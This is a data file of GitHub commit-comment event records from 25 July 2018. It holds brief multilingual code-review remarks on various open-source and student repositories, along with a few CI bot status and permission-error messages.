{"id":"8016551540","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29829089,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:41:08Z","updated_at":"2018-07-25T13:41:08Z","author_association":"COLLABORATOR","body":">...but for correct color there have to be alexa space primaries used in matrix calculations on data.\r\n\r\nWhat would that mean for us?"}},"created_at":"2018-07-25T13:41:08Z"}
{"id":"8016552362","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29829092,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T13:41:16Z","updated_at":"2018-07-25T13:41:16Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T13:41:16Z"}
{"id":"8016556177","type":"CommitCommentEvent","actor":{"login":"Duke7467"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29829099,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T13:41:54Z","updated_at":"2018-07-25T13:41:54Z","author_association":"NONE","body":"like it"}},"created_at":"2018-07-25T13:41:54Z"}
{"id":"8016556195","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29829100,"position":null,"line":null,"path":null,"commit_id":"b93c1817f0b78eacdb68c7883bb8c778caa92174","created_at":"2018-07-25T13:41:54Z","updated_at":"2018-07-25T13:41:54Z","author_association":"OWNER","body":"Nice."}},"created_at":"2018-07-25T13:41:54Z"}
{"id":"8016566400","type":"CommitCommentEvent","actor":{"login":"HyCraftHD"},"repo":{"name":"MC-U-Team/U-Mod"},"payload":{"comment":{"id":29829115,"position":16,"line":18,"path":"src/main/java/info/u_team/u_mod/proxy/ClientProxy.java","commit_id":"f2450dba078424c1af7d7c7a7bc1f5c7cf4ca442","created_at":"2018-07-25T13:43:35Z","updated_at":"2018-07-25T13:43:35Z","author_association":"MEMBER","body":"@MrTroble Mach das mal direkt in der ClientProxy (Musst schon bei den Guis einiges verändern, denn sonst crash das aufm Server."}},"created_at":"2018-07-25T13:43:35Z"}
{"id":"8016566526","type":"CommitCommentEvent","actor":{"login":"barrucadu"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29829116,"position":19,"line":19,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T13:43:36Z","updated_at":"2018-07-25T13:43:36Z","author_association":"NONE","body":"How did you intend it to work?  For instance, I see the `$samples_dir` is `mkdir -p`'d but not then used anywhere."}},"created_at":"2018-07-25T13:43:36Z"}
{"id":"8016570704","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"marco-c/mozilla-releng-services"},"payload":{"comment":{"id":29829122,"position":null,"line":null,"path":null,"commit_id":"183f55bcc38378bcf8f9f4aa3adc406bd1e8bfc3","created_at":"2018-07-25T13:44:18Z","updated_at":"2018-07-25T13:44:18Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1532526258034\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.183f55bcc38378bcf8f9f4aa3adc406bd1e8bfc3\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/marco-c/mozilla-releng-services:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.master.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.master.by-timestamp.1532526258034\",\n    \"queue:route:index.project.releng.services.requests.master.by-revision.183f55bcc38378bcf8f9f4aa3adc406bd1e8bfc3\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-25T13:44:18.102Z\n\n</details>"}},"created_at":"2018-07-25T13:44:18Z"}
{"id":"8016570868","type":"CommitCommentEvent","actor":{"login":"Duke7467"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29829124,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T13:44:20Z","updated_at":"2018-07-25T13:44:20Z","author_association":"NONE","body":"2018-07-25 16:09, oraclepeng yazmış:\n> like it\n> \n> --\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub [1], or mute the\n> thread [2].\n> \n> Links:\n> ------\n> [1]\n> https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828660\n> [2]\n> https://github.com/notifications/unsubscribe-auth/Amq_C8sPr5g4VpHmBFOSYtZ1D8M41icjks5uKG4DgaJpZM4VaEAl\n\n\nDue7467 user is mine. can you send me??\n"}},"created_at":"2018-07-25T13:44:20Z"}
{"id":"8016571326","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829127,"position":6,"line":8,"path":"lesson2/buyers_list.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T13:44:24Z","updated_at":"2018-07-25T13:44:24Z","author_association":"NONE","body":"так как петли с \"антил\" здесь больше нет, то и `begin`, `end` потеряли свой смысл\r\nнужно их убрать и просто оставить строки 6 и 7 внутри метода"}},"created_at":"2018-07-25T13:44:24Z"}
{"id":"8016573569","type":"CommitCommentEvent","actor":{"login":"sortedmap"},"repo":{"name":"sortedmap/layout"},"payload":{"comment":{"id":29829131,"position":14,"line":16,"path":"styles.css","commit_id":"fb95c5ff60c4d4a3648a32aae16bd34aa10724b7","created_at":"2018-07-25T13:44:46Z","updated_at":"2018-07-25T13:44:46Z","author_association":"OWNER","body":"Это лишнее! Достаточно justify-content!"}},"created_at":"2018-07-25T13:44:46Z"}
{"id":"8016580543","type":"CommitCommentEvent","actor":{"login":"DZL1943"},"repo":{"name":"DZL1943/journal"},"payload":{"comment":{"id":29829149,"position":null,"line":null,"path":null,"commit_id":"4457791994974f1466f8f536e241cabbc34200b6","created_at":"2018-07-25T13:45:52Z","updated_at":"2018-07-25T13:45:52Z","author_association":"OWNER","body":"人际关系原理"}},"created_at":"2018-07-25T13:45:52Z"}
{"id":"8016581419","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829152,"position":3,"line":7,"path":"lesson2/buyers_list.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T13:46:00Z","updated_at":"2018-07-25T13:46:00Z","author_association":"NONE","body":"нет смысла присваивать значение в переменную, если она не используется после этого\r\nлокальная переменная `input` в методе не используется, значит она не нужна"}},"created_at":"2018-07-25T13:46:00Z"}
{"id":"8016582283","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29829153,"position":10,"line":10,"path":"04.rb","commit_id":"f09d74909eda9d1ebd766568380c85c75f156129","created_at":"2018-07-25T13:46:09Z","updated_at":"2018-07-25T13:46:09Z","author_association":"NONE","body":"chomp для переменных а, b, c можно не использовать. Методы to_i/to_f убирают символ новой строки за нас"}},"created_at":"2018-07-25T13:46:09Z"}
{"id":"8016583648","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/hdat"},"payload":{"comment":{"id":29829159,"position":1,"line":1,"path":"tests/csv_test.py","commit_id":"ac2125ecf5d4da69976f5085ef9cdd996ceb5316","created_at":"2018-07-25T13:46:21Z","updated_at":"2018-07-25T13:46:21Z","author_association":"CONTRIBUTOR","body":"We should probably rename this file to \"tests/reports_test.py\""}},"created_at":"2018-07-25T13:46:21Z"}
{"id":"8016588011","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29829162,"position":null,"line":null,"path":null,"commit_id":"f09d74909eda9d1ebd766568380c85c75f156129","created_at":"2018-07-25T13:47:02Z","updated_at":"2018-07-25T13:47:02Z","author_association":"NONE","body":"Лучше назвать файл ideal_weight.rb а не 4.rb"}},"created_at":"2018-07-25T13:47:02Z"}
{"id":"8016592838","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829172,"position":3,"line":7,"path":"lesson2/buyers_list.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T13:47:48Z","updated_at":"2018-07-25T13:47:48Z","author_association":"NONE","body":"правильно будет использовать просто `chomp` без восклицательного знака\r\n\"бенг-методы\" с восклицательным знаком мутируют уже существующую переменную, а тебе нужно преобразовать полученное значение и вернуть его, \"бенг-метод\" не нужен"}},"created_at":"2018-07-25T13:47:48Z"}
{"id":"8016604202","type":"CommitCommentEvent","actor":{"login":"brtdv"},"repo":{"name":"CleverIT/UBL_invoice"},"payload":{"comment":{"id":29829200,"position":null,"line":null,"path":null,"commit_id":"d219ac5889a681f96902b8db03748377de5769d2","created_at":"2018-07-25T13:49:32Z","updated_at":"2018-07-25T13:49:32Z","author_association":"NONE","body":"I'm not sure but I don't think it's required on the <Invoice> element... And that's the code I removed. If it's included, it seems it is missing some subnodes that are required when it's added as a subnode on <Invoice>, so that's why I made it *not* required on the <Invoice> element."}},"created_at":"2018-07-25T13:49:32Z"}
{"id":"8016604271","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"google/benchmark"},"payload":{"comment":{"id":29829202,"position":23,"line":41,"path":"README.md","commit_id":"d7aed73677888834d4e8af2b300d01bfb724b70f","created_at":"2018-07-25T13:49:33Z","updated_at":"2018-07-25T13:49:33Z","author_association":"CONTRIBUTOR","body":"This removal should be reverted, since\r\nhttps://github.com/google/benchmark/blob/6d74c0625b8e88c1afce72b4f383c91b9a99dbe6/cmake/HandleGTest.cmake#L102"}},"created_at":"2018-07-25T13:49:33Z"}
{"id":"8016605581","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/hdat"},"payload":{"comment":{"id":29829207,"position":12,"line":27,"path":"hdat/reports.py","commit_id":"ac2125ecf5d4da69976f5085ef9cdd996ceb5316","created_at":"2018-07-25T13:49:46Z","updated_at":"2018-07-25T13:49:46Z","author_association":"CONTRIBUTOR","body":"I see the situation that is causing the `TypeError`s.  I think the way you have handled this (using a try/catch) is the right way to handle it using duck-typing.  The only other approach (that I can think of) is to test whether `result` is a dict.\r\n\r\nI don't think we need to print an error message though. I think we can just return `None`.  I.e., I think we can delete lines 28 and 29."}},"created_at":"2018-07-25T13:49:46Z"}
{"id":"8016608181","type":"CommitCommentEvent","actor":{"login":"Pecfex"},"repo":{"name":"Lemmmy/a-dick"},"payload":{"comment":{"id":29829214,"position":null,"line":null,"path":null,"commit_id":"defb04bf697fee8f633e19e648efb97a0d8bde22","created_at":"2018-07-25T13:50:12Z","updated_at":"2018-07-25T13:50:12Z","author_association":"NONE","body":"go commit die"}},"created_at":"2018-07-25T13:50:12Z"}
{"id":"8016608706","type":"CommitCommentEvent","actor":{"login":"kimsungkyu0403"},"repo":{"name":"kimsungkyu0403/ConvertUnit"},"payload":{"comment":{"id":29829216,"position":null,"line":null,"path":null,"commit_id":"5d4d0beac947bf0fbad76b9f1a011096e4a0bfc6","created_at":"2018-07-25T13:50:16Z","updated_at":"2018-07-25T13:50:16Z","author_association":"OWNER","body":"세미나 종료"}},"created_at":"2018-07-25T13:50:16Z"}
{"id":"8016609230","type":"CommitCommentEvent","actor":{"login":"mwiesenberger"},"repo":{"name":"feltor-dev/feltor"},"payload":{"comment":{"id":29829218,"position":92,"line":1188,"path":"inc/dg/functors.h","commit_id":"5fce6d8f7036f449eaf0f035008a9dab4b433256","created_at":"2018-07-25T13:50:21Z","updated_at":"2018-07-25T13:50:21Z","author_association":"MEMBER","body":"ahh beim bath darf kein DG_DEVICE stehen, weil das auf der GPU nicht ausführt (wegen den std::vector in den Variablen)\r\nsorry, hätts dazu schreiben sollen."}},"created_at":"2018-07-25T13:50:21Z"}
{"id":"8016613229","type":"CommitCommentEvent","actor":{"login":"pea3nut"},"repo":{"name":"pea3nut/pxer-homepage"},"payload":{"comment":{"id":29829230,"position":5,"line":11,"path":"routes/md.js","commit_id":"df5586207511cd6d34f471b851ef1f9e1fc83e6e","created_at":"2018-07-25T13:50:58Z","updated_at":"2018-07-25T13:50:58Z","author_association":"OWNER","body":"My mistake, [\\w\\-] is my want."}},"created_at":"2018-07-25T13:50:58Z"}
{"id":"8016614034","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829232,"position":16,"line":20,"path":"lesson2/buyers_list.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T13:51:05Z","updated_at":"2018-07-25T13:51:05Z","author_association":"NONE","body":"решение работающее, но в будущем старайся избегать подобных вложений вызовов метода инпута в структуру хранения данных\r\nэто неправильная практика\r\nинпут / аутпут лучше писать отдельными строками\r\nструктуры данных заполнять отдельными\r\nпреобразования данных делать в третьем месте\r\nвсе по полочкам, так код легче читается и обслуживаеся"}},"created_at":"2018-07-25T13:51:05Z"}
{"id":"8016616311","type":"CommitCommentEvent","actor":{"login":"Lemmmy"},"repo":{"name":"Lemmmy/a-dick"},"payload":{"comment":{"id":29829235,"position":null,"line":null,"path":null,"commit_id":"defb04bf697fee8f633e19e648efb97a0d8bde22","created_at":"2018-07-25T13:51:25Z","updated_at":"2018-07-25T13:51:25Z","author_association":"OWNER","body":"thanks babe"}},"created_at":"2018-07-25T13:51:25Z"}
{"id":"8016619034","type":"CommitCommentEvent","actor":{"login":"mwiesenberger"},"repo":{"name":"feltor-dev/feltor"},"payload":{"comment":{"id":29829244,"position":5,"line":416,"path":"inc/dg/functors.h","commit_id":"5fce6d8f7036f449eaf0f035008a9dab4b433256","created_at":"2018-07-25T13:51:51Z","updated_at":"2018-07-25T13:51:51Z","author_association":"MEMBER","body":"sollte eps heißen, nicht epsilon, oder? Und ist das wirklich die background amplitude?"}},"created_at":"2018-07-25T13:51:51Z"}
{"id":"8016619616","type":"CommitCommentEvent","actor":{"login":"mrmirkore"},"repo":{"name":"darioibiza/helloworld"},"payload":{"comment":{"id":29829247,"position":null,"line":null,"path":null,"commit_id":"53ba456ab5a666159782634a9952c323f6fd0d5a","created_at":"2018-07-25T13:51:57Z","updated_at":"2018-07-25T13:51:57Z","author_association":"NONE","body":"io preferivo raymond culo!!!"}},"created_at":"2018-07-25T13:51:57Z"}
{"id":"8016622167","type":"CommitCommentEvent","actor":{"login":"elliotcm"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29829250,"position":19,"line":19,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T13:52:21Z","updated_at":"2018-07-25T13:52:21Z","author_association":"NONE","body":"I hadn't quite got there yet.  The idea was for the user to put the sample files in that directory (sourced as per the link) and to read them and treat them very similarly to the postcode list.\r\n\r\nThe thought was to run it before and after the upgrade, and have the \"after\" run compare the results.  Your idea would streamline that for integration and staging (because we can assume they're the same as prod pre-import) but you couldn't use it check prod against its past self."}},"created_at":"2018-07-25T13:52:21Z"}
{"id":"8016625302","type":"CommitCommentEvent","actor":{"login":"kimsungkyu0403"},"repo":{"name":"kimsungkyu0403/ConvertUnit"},"payload":{"comment":{"id":29829259,"position":null,"line":null,"path":null,"commit_id":"5d4d0beac947bf0fbad76b9f1a011096e4a0bfc6","created_at":"2018-07-25T13:52:50Z","updated_at":"2018-07-25T13:52:50Z","author_association":"OWNER","body":"세미나 완료"}},"created_at":"2018-07-25T13:52:50Z"}
{"id":"8016643863","type":"CommitCommentEvent","actor":{"login":"jurajkapsz"},"repo":{"name":"jurajkapsz/hashid_field"},"payload":{"comment":{"id":29829291,"position":null,"line":null,"path":null,"commit_id":"aa98378b52b71b620b77454b5fb1afb6ab593b61","created_at":"2018-07-25T13:55:46Z","updated_at":"2018-07-25T13:55:46Z","author_association":"OWNER","body":"If someone else could also test this, I would appreciate. Tested on MySQL v5.6 and MariaDB v10.1 ."}},"created_at":"2018-07-25T13:55:46Z"}
{"id":"8016660740","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/GeoNature"},"payload":{"comment":{"id":29829323,"position":null,"line":null,"path":null,"commit_id":"a77d387e4ccc8c5a2f2d91a9955cc79ec4287f80","created_at":"2018-07-25T13:58:22Z","updated_at":"2018-07-25T13:58:22Z","author_association":"MEMBER","body":"Top restera plus qu'à MAJ la doc developper.\nMerci."}},"created_at":"2018-07-25T13:58:22Z"}
{"id":"8016661423","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829324,"position":14,"line":15,"path":"lesson2/buyers_list.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T13:58:29Z","updated_at":"2018-07-25T13:58:29Z","author_association":"NONE","body":"здесь работает только с хеш-рокет, потому что это переменная\r\n\"новый\" синтаксис возможен только для символов\r\nпри использовании переменных в качестве ключа нужно использовать хеш-рокет "}},"created_at":"2018-07-25T13:58:29Z"}
{"id":"8016662458","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"fbrosson/haikuports"},"payload":{"comment":{"id":29829325,"position":null,"line":null,"path":null,"commit_id":"da1fe3054e2ff978104593d47567a7b45e9af7cf","created_at":"2018-07-25T13:58:38Z","updated_at":"2018-07-25T13:58:38Z","author_association":"OWNER","body":"No problem."}},"created_at":"2018-07-25T13:58:38Z"}
{"id":"8016662736","type":"CommitCommentEvent","actor":{"login":"jonathonmcmurray"},"repo":{"name":"jonathonmcmurray/reQ"},"payload":{"comment":{"id":29829326,"position":null,"line":null,"path":null,"commit_id":"9c2926f752878f9206045e5d1cc064a984b38804","created_at":"2018-07-25T13:58:41Z","updated_at":"2018-07-25T13:58:41Z","author_association":"OWNER","body":"URL related points that remain:\r\n\r\n* Fix `.url.query` for case where multiple `?` in URL\r\n* Update main `.req` functions to use `.url` functions where necessary\r\n* Restructure `.req.send` to make sensible use of new URL \"object\"\r\n* Load `url.q` code"}},"created_at":"2018-07-25T13:58:41Z"}
{"id":"8016663457","type":"CommitCommentEvent","actor":{"login":"FileEX"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29829328,"position":null,"line":null,"path":null,"commit_id":"e31ff918cf3fd53c049c7cdf0cdf7a0e413a0a9e","created_at":"2018-07-25T13:58:48Z","updated_at":"2018-07-25T13:58:48Z","author_association":"CONTRIBUTOR","body":"@Einheit-101 Fixed https://github.com/multitheftauto/mtasa-blue/commit/aa8dc677cb054cabd576311a0bae40a7fecfbd60"}},"created_at":"2018-07-25T13:58:48Z"}
{"id":"8016664100","type":"CommitCommentEvent","actor":{"login":"michelesr"},"repo":{"name":"michelesr/nvidia-xrun"},"payload":{"comment":{"id":29829329,"position":29,"line":74,"path":"nvidia-xrun","commit_id":"a445a86979ecd846c0690913fe5860a8ac49750d","created_at":"2018-07-25T13:58:53Z","updated_at":"2018-07-25T13:58:53Z","author_association":"OWNER","body":"TODO: find out why this is working only when the AC adapter is plugged."}},"created_at":"2018-07-25T13:58:53Z"}
{"id":"8016664152","type":"CommitCommentEvent","actor":{"login":"hithacker"},"repo":{"name":"OpenCHS/openchs-server"},"payload":{"comment":{"id":29829330,"position":null,"line":null,"path":null,"commit_id":"0ac9f1b7b281b8949b3b5cf6b6b7fe4ee8f0e88b","created_at":"2018-07-25T13:58:54Z","updated_at":"2018-07-25T13:58:54Z","author_association":"CONTRIBUTOR","body":"Awesome 😃"}},"created_at":"2018-07-25T13:58:54Z"}
{"id":"8016668788","type":"CommitCommentEvent","actor":{"login":"barrucadu"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29829335,"position":19,"line":19,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T13:59:38Z","updated_at":"2018-07-25T13:59:38Z","author_association":"NONE","body":"Ok, makes sense.  I'll go for that approach."}},"created_at":"2018-07-25T13:59:38Z"}
{"id":"8016670226","type":"CommitCommentEvent","actor":{"login":"konradko"},"repo":{"name":"uktrade/directory-forms-api-client"},"payload":{"comment":{"id":29829337,"position":6,"line":6,"path":"directory_forms_api_client/forms.py","commit_id":"105ad94bb62e8c2d1385743789c7c9ee4a523077","created_at":"2018-07-25T13:59:53Z","updated_at":"2018-07-25T13:59:53Z","author_association":"MEMBER","body":"Or `FormsAPI` :-)"}},"created_at":"2018-07-25T13:59:53Z"}
{"id":"8016672119","type":"CommitCommentEvent","actor":{"login":"konradko"},"repo":{"name":"uktrade/directory-forms-api-client"},"payload":{"comment":{"id":29829343,"position":21,"line":21,"path":"directory_forms_api_client/backends.py","commit_id":"105ad94bb62e8c2d1385743789c7c9ee4a523077","created_at":"2018-07-25T14:00:11Z","updated_at":"2018-07-25T14:00:11Z","author_association":"MEMBER","body":"I think it is more common to end the name of the class with the 'type', e.g. `S3BotoStorage` and `ListEmailView`, so `APIFormsEmailBackend` or `FormsAPIEmailBackend`"}},"created_at":"2018-07-25T14:00:11Z"}
{"id":"8016675446","type":"CommitCommentEvent","actor":{"login":"pavelloz"},"repo":{"name":"mdyd-dev/nearme-documentation"},"payload":{"comment":{"id":29829353,"position":null,"line":null,"path":null,"commit_id":"60bb9ce6493032ab1c699d2e834d4707a776486d","created_at":"2018-07-25T14:00:38Z","updated_at":"2018-07-25T14:00:38Z","author_association":"COLLABORATOR","body":"🎶 "}},"created_at":"2018-07-25T14:00:38Z"}
{"id":"8016686789","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29829372,"position":null,"line":null,"path":null,"commit_id":"d300d1f61b2b368a1cba64b6f33b1d0e870d9725","created_at":"2018-07-25T14:02:23Z","updated_at":"2018-07-25T14:02:23Z","author_association":"OWNER","body":"> The code is certainly simpler, but less efficient, since two std::string instances have to be created (and destroyed again), involving allocation and deallocation.\r\n\r\nhmm.. I thought that the matchcompiler converted such string literals."}},"created_at":"2018-07-25T14:02:23Z"}
{"id":"8016687069","type":"CommitCommentEvent","actor":{"login":"homer8173"},"repo":{"name":"CleverIT/UBL_invoice"},"payload":{"comment":{"id":29829375,"position":null,"line":null,"path":null,"commit_id":"d219ac5889a681f96902b8db03748377de5769d2","created_at":"2018-07-25T14:02:26Z","updated_at":"2018-07-25T14:02:26Z","author_association":"NONE","body":"Doc says Sequence [1..1], it s 0..n syntaxe\r\nso minimum is 1 and maximum is 1.\r\nOn my understanding it s required and cbc:TaxAmount [1..1]   is required too\r\n"}},"created_at":"2018-07-25T14:02:26Z"}
{"id":"8016687758","type":"CommitCommentEvent","actor":{"login":"sidnand"},"repo":{"name":"sidnand/Askers-API"},"payload":{"comment":{"id":29829377,"position":null,"line":null,"path":null,"commit_id":"2faf3850b785e204853d7b6c8fd0a75f69103a48","created_at":"2018-07-25T14:02:32Z","updated_at":"2018-07-25T14:02:32Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-25T14:02:32Z"}
{"id":"8016691677","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29829385,"position":14,"line":15,"path":"lesson2/date.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-25T14:03:09Z","updated_at":"2018-07-25T14:03:09Z","author_association":"NONE","body":"в руби не рекомендуют использовать `if / end` блоки без `else` ветви, если код умещается на одной строке\r\nдля такого случая предпочтение отдается \"постфиксной\" форме `if`\r\nдругими словами вместо\r\n```ruby {.line-numbers}\r\n    if a > b\r\n      do_something\r\n    end\r\n```\r\nрекомендуется писать\r\n```ruby {.line-numbers}\r\n    do_something if a > b\r\n```\r\n\r\nможно и нужно использовать префиксный if (до тела), если:\r\n- код, выполняемый по условию сложный (в несколько строк)\r\n- код занимает одну строку, но она длинаая"}},"created_at":"2018-07-25T14:03:09Z"}
{"id":"8016691898","type":"CommitCommentEvent","actor":{"login":"konradko"},"repo":{"name":"uktrade/directory-forms-api-client"},"payload":{"comment":{"id":29829386,"position":23,"line":23,"path":"setup.py","commit_id":"105ad94bb62e8c2d1385743789c7c9ee4a523077","created_at":"2018-07-25T14:03:11Z","updated_at":"2018-07-25T14:03:11Z","author_association":"MEMBER","body":"this doesn't work with a newer version of pip, see sigauth - the reqs are hardcoded there now, we need to either find a new method for loading from requirements.txt or hardcode"}},"created_at":"2018-07-25T14:03:11Z"}
{"id":"8016692516","type":"CommitCommentEvent","actor":{"login":"Treeek"},"repo":{"name":"Treeek/Plataforma-de-Galeria-Para-Designers"},"payload":{"comment":{"id":29829389,"position":null,"line":null,"path":null,"commit_id":"dbb2e77cb86be3247219604cf776bd3a5d66c89c","created_at":"2018-07-25T14:03:17Z","updated_at":"2018-07-25T14:03:17Z","author_association":"OWNER","body":"concordo\r\n"}},"created_at":"2018-07-25T14:03:17Z"}
{"id":"8016700174","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29829407,"position":null,"line":null,"path":null,"commit_id":"83e2e8199f08bc4fb0cd9cb7d000680524a4bbde","created_at":"2018-07-25T14:04:28Z","updated_at":"2018-07-25T14:04:28Z","author_association":"NONE","body":"Great!\r\nAwaiting new build"}},"created_at":"2018-07-25T14:04:28Z"}
{"id":"8016708427","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29829419,"position":22,"line":8,"path":"1/right_triangle.rb","commit_id":"f1dce476a162d2f40eadf1d1ee11baef68b1d0db","created_at":"2018-07-25T14:05:45Z","updated_at":"2018-07-25T14:05:45Z","author_association":"NONE","body":"```\r\nCаму конструкцию {|x, y| y <=> x } нашёл через гугл, но не смог найти её смысла, подскажите, пожалуйста, в чём её суть?\r\n```\r\nДумаю самое непонятное место, это ``` <=> ```. Это так-называемый spaceship оператор. Это опертор, который пришел в руби из языка Perl. Его суть в том, что он сравнивает два значения (слева и справа от себя). Если \"y\" больше \"x\" то вернется -1, если они равны то вернется 0, и в случае, если правый операнд больше то вернется 1. На самом деле, это поведение настолько часто использовалось, что это стало поведением метода #sort по умолчанию. И если убрать все правее вызова метода sort то будет работать точно так-же. Это то, что происходит за кулисами. Руби по очереди сравнивает каждое значение в массиве и меняет их порядком, если нужно."}},"created_at":"2018-07-25T14:05:45Z"}
{"id":"8016708990","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"wildfly/wildfly-proposals"},"payload":{"comment":{"id":29829420,"position":43,"line":43,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"c802dace480baeddb635838d81bb26035bd47f0f","created_at":"2018-07-25T14:05:50Z","updated_at":"2018-07-25T14:05:50Z","author_association":"CONTRIBUTOR","body":"\"filtering-key-store resource for the underlying\" -> \"filtering-key-store resource so the underlying\""}},"created_at":"2018-07-25T14:05:50Z"}
